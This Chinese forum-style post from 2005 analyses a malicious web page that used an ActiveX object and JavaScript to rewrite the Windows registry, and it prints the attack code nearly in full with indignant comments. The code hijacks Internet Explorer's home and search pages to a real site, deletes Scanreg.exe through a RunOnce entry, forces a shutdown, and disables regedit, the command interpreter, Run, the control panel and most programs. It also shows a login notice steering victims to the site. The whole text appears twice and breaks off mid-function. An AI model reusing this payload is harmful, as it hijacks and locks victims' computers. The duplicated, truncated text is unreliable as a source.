2005-9-24 13:44
作者: 荻芦夜雪
最近一段时间网页恶意代码对本地注册表的修改可以说是闹得沸沸扬扬,从改IE标题开始到改首页,甚至还发展到锁定INTERNET选项和注册表编辑器阻止用户恢复自己的IE!真是愈来愈严重了。开始改标题的时候只不过像小孩子跑到别人家的大门上用粉笔涂上“XX到此一游”,到后来就变质成了强盗要霸占整个家园。本来也许站长的原意是希望自己站点的访问量能高一些,不过很遗憾用错了方法,上过当的网民再也不会到他的站点去了。好了,废话少说,我们来看一下这究竟是怎么回事。
其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用WINDOWS的基本程序。够狠的了。
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function
function f(){
try
{
//ActiveX initialization (这里初始化ACTIVEX,为修改浏览者的注册表做准备。)
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
//set home page
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u /autorun");(注意这里,Scanreg.exe被删除!这样就阻挠了浏览者通过恢复浏览之前的注册表来修复系统!想想这意味着什么?它既然可以不经过同意而删除机器中的文件,那么也可以做别的事情。包括:在没有通知的情况下格式化硬盘!)
从这里开始把IE的标题,首页,搜索页等等改得一塌糊涂,亲眼见到的话你一定忍不住想问:这是天天陪着我到处闲逛的IE吗?:)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\backbitmapie5","c:\\Windows\\web\\wvleft.bmp");
Shl.RegWrite ("HKCR\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKCU\\Software\\Classes\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SearchPage","http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", " http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","rem C:\\WINDOWS\\sys tem\\BROWSEUI.DLL");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar", "1","REG_DWORD");(开始菜单中的"设置\任务栏和开始菜单"命令被禁止)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind","1","REG_DWORD");("查找"命令被禁止)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions","1","REG_DWORD");(禁止IE显示“工具”中“INTERNET选项”)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu","1","REG_DWORD");(禁止使用鼠标右键。搞什么啊,这样都禁止?:()
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun","1","REG_DWORD");(禁用开始菜单的"运行". )
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd","1","REG_DWORD");(禁止运行命令解释器)
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","1","REG_DWORD");(让操作系统无法切换至DOS实模式)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "问候");(开机即跳出对话框。像个幽灵一般如影随形。)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","朋友:非常感谢你访问过我们的网站<http://user.netomia.com/wjkplx/>经测试你的电脑存在严重的漏洞隐患,你的电脑已被设置了一些障碍,只能运行一少部份程序。请点击桌面上的【安全测试网】快捷键上我们的网站去恢复,点击秘密特区链接,按提示做即可。或者点击下载解锁程序。");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");(禁止IE的右键菜单功能)
Shl.RegWrite ("HKLM\\Software\\CLASSES\\.reg\\","txtfile");(禁止使用reg文件。想要通过编辑REG文件解除锁定不行了。:(黑心的站长啊,我反正是很想PK他,不知道你怎么想?)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\sys tem\\DisableRegistryTools","1","REG_DWORD");(禁止使用注册表程序regedit.exe)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","1","REG_DWORD");(禁用“控制面板”。怎么感觉这个站长是开网吧的?呵呵)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");(禁止IE的右键菜单功能。生怕别人看他的源码)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions","1","REG_DWORD");(禁止Internet选项)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserSaveAs","1","REG_DWORD");(禁用“另存为……”)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFileOpen","1","REG_DWORD");(禁止“文件”菜单下面的“打开”功能)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoTheaterMode","1","REG_DWORD");(禁止全屏模式对IE控制面板的控制)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Advanced","1","REG_DWORD");(禁止更改高级页设置 )
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Cache Internet","1","REG_DWORD");(禁止更改临时文件的设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\AutoConfig","1","REG_DWORD");(禁止更改自动配置的设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage","1","REG_DWORD");(禁止更改主页设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\History","1","REG_DWORD");(禁止更改历史纪录设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Connwiz Admin Lock","1","REG_DWORD");(禁止Internet连接向导)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Check_If_Default","1","REG_DWORD");(禁止更改默认浏览器检查)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ContentTab","1","REG_DWORD");(禁止内容项)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\安全测试网"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\blank"," http://user.netomia.com/wjkplx/");(IE如果有一点地方没有他网站的影子他就睡不着觉?)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecurityTab","1","REG_DWORD");(禁止安全项)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ResetWebSettings","1","REG_DWORD");(禁止“重置Web设置”功能)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD");(禁止“源文件”。美其名曰“保护知识产权”。)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions\\NoAddingSubScriptions","1","REG_DWORD");(禁止添加脱机页计划)
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu","1","REG_DWORD");(禁止“资源管理器”中的“文件”菜单)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Settings","1","REG_DWORD");(禁止更改连接设置)
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","1","REG_DWORD");(禁止使用任何程序!真是阴险,站长肯定是怕偶们不会用计算机给弄坏了所以帮忙锁起来。不过下面还是开放了几个基本程序供使用的:Iexplore.exe,ACDSee32.exe等。看看下面的程序名就知道你能用什么程序了。)
最近一段时间网页恶意代码对本地注册表的修改可以说是闹得沸沸扬扬,从改IE标题开始到改首页,甚至还发展到锁定INTERNET选项和注册表编辑器阻止用户恢复自己的IE!真是愈来愈严重了。开始改标题的时候只不过像小孩子跑到别人家的大门上用粉笔涂上“XX到此一游”,到后来就变质成了强盗要霸占整个家园。本来也许站长的原意是希望自己站点的访问量能高一些,不过很遗憾用错了方法,上过当的网民再也不会到他的站点去了。好了,废话少说,我们来看一下这究竟是怎么回事。
其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用WINDOWS的基本程序。够狠的了。
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function
function f(){
try
{
//ActiveX initialization (这里初始化ACTIVEX,为修改浏览者的注册表做准备。)
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
//set home page
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u /autorun");(注意这里,Scanreg.exe被删除!这样就阻挠了浏览者通过恢复浏览之前的注册表来修复系统!想想这意味着什么?它既然可以不经过同意而删除机器中的文件,那么也可以做别的事情。包括:在没有通知的情况下格式化硬盘!)
从这里开始把IE的标题,首页,搜索页等等改得一塌糊涂,亲眼见到的话你一定忍不住想问:这是天天陪着我到处闲逛的IE吗?:)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\backbitmapie5","c:\\Windows\\web\\wvleft.bmp");
Shl.RegWrite ("HKCR\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKCU\\Software\\Classes\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全测试网");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= ★ 安全测试网★---<<测出你的系统上网极不安全,恢复后请将IE安全级别设为高>>");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SearchPage","http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", " http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","rem C:\\WINDOWS\\sys tem\\BROWSEUI.DLL");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar", "1","REG_DWORD");(开始菜单中的"设置\任务栏和开始菜单"命令被禁止)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind","1","REG_DWORD");("查找"命令被禁止)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions","1","REG_DWORD");(禁止IE显示“工具”中“INTERNET选项”)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu","1","REG_DWORD");(禁止使用鼠标右键。搞什么啊,这样都禁止?:()
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun","1","REG_DWORD");(禁用开始菜单的"运行". )
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd","1","REG_DWORD");(禁止运行命令解释器)
Shl.RegWrite
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","1","REG_DWORD");(让操作系统无法切换至DOS实模式)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "问候");(开机即跳出对话框。像个幽灵一般如影随形。)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","朋友:非常感谢你访问过我们的网站<http://user.netomia.com/wjkplx/>经测试你的电脑存在严重的漏洞隐患,你的电脑已被设置了一些障碍,只能运行一少部份程序。请点击桌面上的【安全测试网】快捷键上我们的网站去恢复,点击秘密特区链接,按提示做即可。或者点击下载解锁程序。");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");(禁止IE的右键菜单功能)
Shl.RegWrite ("HKLM\\Software\\CLASSES\\.reg\\","txtfile");(禁止使用reg文件。想要通过编辑REG文件解除锁定不行了。:(黑心的站长啊,我反正是很想PK他,不知道你怎么想?)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\sys tem\\DisableRegistryTools","1","REG_DWORD");(禁止使用注册表程序regedit.exe)
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","1","REG_DWORD");(禁用“控制面板”。怎么感觉这个站长是开网吧的?呵呵)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");(禁止IE的右键菜单功能。生怕别人看他的源码)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions","1","REG_DWORD");(禁止Internet选项)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserSaveAs","1","REG_DWORD");(禁用“另存为……”)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFileOpen","1","REG_DWORD");(禁止“文件”菜单下面的“打开”功能)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoTheaterMode","1","REG_DWORD");(禁止全屏模式对IE控制面板的控制)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Advanced","1","REG_DWORD");(禁止更改高级页设置 )
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Cache Internet","1","REG_DWORD");(禁止更改临时文件的设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\AutoConfig","1","REG_DWORD");(禁止更改自动配置的设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage","1","REG_DWORD");(禁止更改主页设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\History","1","REG_DWORD");(禁止更改历史纪录设置)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Connwiz Admin Lock","1","REG_DWORD");(禁止Internet连接向导)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Check_If_Default","1","REG_DWORD");(禁止更改默认浏览器检查)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ContentTab","1","REG_DWORD");(禁止内容项)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\安全测试网"," http://user.netomia.com/wjkplx/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\blank"," http://user.netomia.com/wjkplx/");(IE如果有一点地方没有他网站的影子他就睡不着觉?)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecurityTab","1","REG_DWORD");(禁止安全项)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ResetWebSettings","1","REG_DWORD");(禁止“重置Web设置”功能)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD");(禁止“源文件”。美其名曰“保护知识产权”。)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions\\NoAddingSubScriptions","1","REG_DWORD");(禁止添加脱机页计划)
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu","1","REG_DWORD");(禁止“资源管理器”中的“文件”菜单)
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Settings","1","REG_DWORD");(禁止更改连接设置)
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","1","REG_DWORD");(禁止使用任何程序!真是阴险,站长肯定是怕偶们不会用计算机给弄坏了所以帮忙锁起来。不过下面还是开放了几个基本程序供使用的:Iexplore.exe,ACDSee32.exe等。看看下面的程序名就知道你能用什么程序了。)